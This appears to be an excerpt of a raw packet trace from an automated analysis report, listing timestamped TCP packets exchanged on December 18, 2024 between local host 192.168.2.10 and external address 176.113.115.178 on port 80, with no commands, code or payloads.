                                                        Dec 18, 2024 14:08:25.310767889 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.310822964 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.311719894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.311741114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.311814070 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.312721014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.312740088 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.312787056 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.313766003 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.313780069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.313838005 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.314712048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.314830065 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.314908028 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.315746069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.315840960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.315921068 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.316808939 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.316859007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.316966057 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.318033934 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.318054914 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.318119049 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.318813086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.318960905 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.319015980 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.319889069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.320063114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.320183992 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.320938110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.321276903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.321350098 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.321943998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.322006941 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.322047949 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.323112965 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.323126078 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.323168039 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.323956966 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.343879938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.343946934 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.343992949 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.344428062 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.344528913 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.344722986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.344821930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.345166922 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.345916986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.345931053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.346230030 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.346829891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.396497011 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.465344906 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.465437889 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.465538025 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.465708017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.465814114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.465866089 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.466738939 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.466785908 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.466834068 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.467772961 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.467783928 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.467832088 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.468488932 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.468583107 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.468645096 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.469595909 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.469609022 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.469660044 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.470612049 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.470932961 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.470992088 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.471791983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.471805096 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.471937895 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.472619057 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.472742081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.472798109 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.473612070 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.473793983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.473850012 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.474637985 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.474853039 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.474915981 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.475744009 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.475758076 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.475825071 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.476950884 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.476963997 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.477020025 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.477873087 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.477891922 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.477972984 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.478779078 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.478929043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.479017019 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.479859114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.479871988 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.480125904 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.480942011 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.480959892 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.481008053 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.481853008 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.482045889 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.482095003 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.483012915 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.483258009 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.483303070 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.484049082 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.484244108 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.484296083 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.485086918 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.485127926 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.485182047 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.486104012 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.486258030 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.486428976 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.487021923 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.487138033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.487200022 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.488255978 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.488420010 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.488506079 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.489595890 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.489680052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.489918947 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.490995884 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.491071939 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.491128922 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.491878986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.492007017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.492139101 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.492961884 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.493029118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.493166924 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.493748903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.493825912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.493916035 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.494663000 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.494674921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.494736910 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.495387077 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.495491028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.495590925 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.496609926 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.496654987 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.496714115 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.497632027 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.497782946 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.497885942 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.498693943 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.498769999 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.498832941 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.499759912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.499771118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.499931097 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.501018047 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.501029968 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.501142979 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.501888037 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.501900911 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.501950026 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.502799034 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.502810955 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.502983093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.503592968 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.503669977 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.503879070 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.504666090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.504686117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.504909039 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.505626917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.505731106 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.505815029 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.506691933 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.506802082 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.506875038 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.507735014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.507776976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.507833004 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.508713961 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.508795023 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.508840084 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.509763002 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.509905100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.509953022 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.510771036 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.510970116 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.511023045 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.511837959 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.512032986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.512095928 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.512814999 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.512974024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.513134956 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.513865948 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.513958931 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.514060974 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.514909983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.515010118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.515055895 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.515938997 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.535696030 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.535851955 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.535891056 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.536358118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.536422968 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.536586046 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.537084103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.537100077 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.537144899 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.537889957 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.537944078 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.657349110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.657403946 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.657474041 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.657748938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.657877922 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.657934904 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.658808947 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.658838034 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.658898115 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.659773111 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.659862995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.659919024 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.660593987 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.660723925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.660795927 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.661523104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.661640882 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.661737919 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.662539959 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.662664890 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.662722111 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.663775921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.663793087 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.663871050 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.664701939 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.664834023 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.664889097 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.665818930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.665832043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.665973902 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.666759968 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.666776896 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.666836023 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.668380976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.668392897 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.668483973 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.669202089 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.669394970 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.669445038 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.670144081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.670464993 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.670527935 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.670909882 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.671030998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.671071053 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.671884060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.671977997 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.672120094 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.672902107 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.672996998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.673083067 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.673948050 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.674124956 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.674221992 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.674945116 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.675055981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.675111055 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.676078081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.676249981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.676318884 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.677239895 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.677252054 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.677319050 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.678586960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.678599119 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.678666115 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.679137945 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.679209948 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.679259062 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.680108070 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.680279016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.680356026 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.681206942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.681243896 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.681283951 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.682343960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.682358980 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.682414055 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.683274031 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.683378935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.683474064 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.684293985 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.684499979 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.684576035 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.685569048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.685580969 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.685633898 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.686388969 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.686485052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.686578035 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.687422037 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.687472105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.687521935 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.688599110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.688643932 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.688695908 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.689506054 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.689537048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.689579964 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.690435886 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.690598011 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.690660000 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.691536903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.691591024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.691654921 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.692595005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.692717075 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.692806959 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.693552017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.693666935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.693730116 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.694560051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.694673061 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.694746017 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.695806980 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.695817947 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.695885897 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.696640015 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.696757078 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.696806908 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.697768927 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.697781086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.697824955 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:25.698797941 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.698810101 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:25.698854923 CET4974680192.168.2.10176.113.115.178
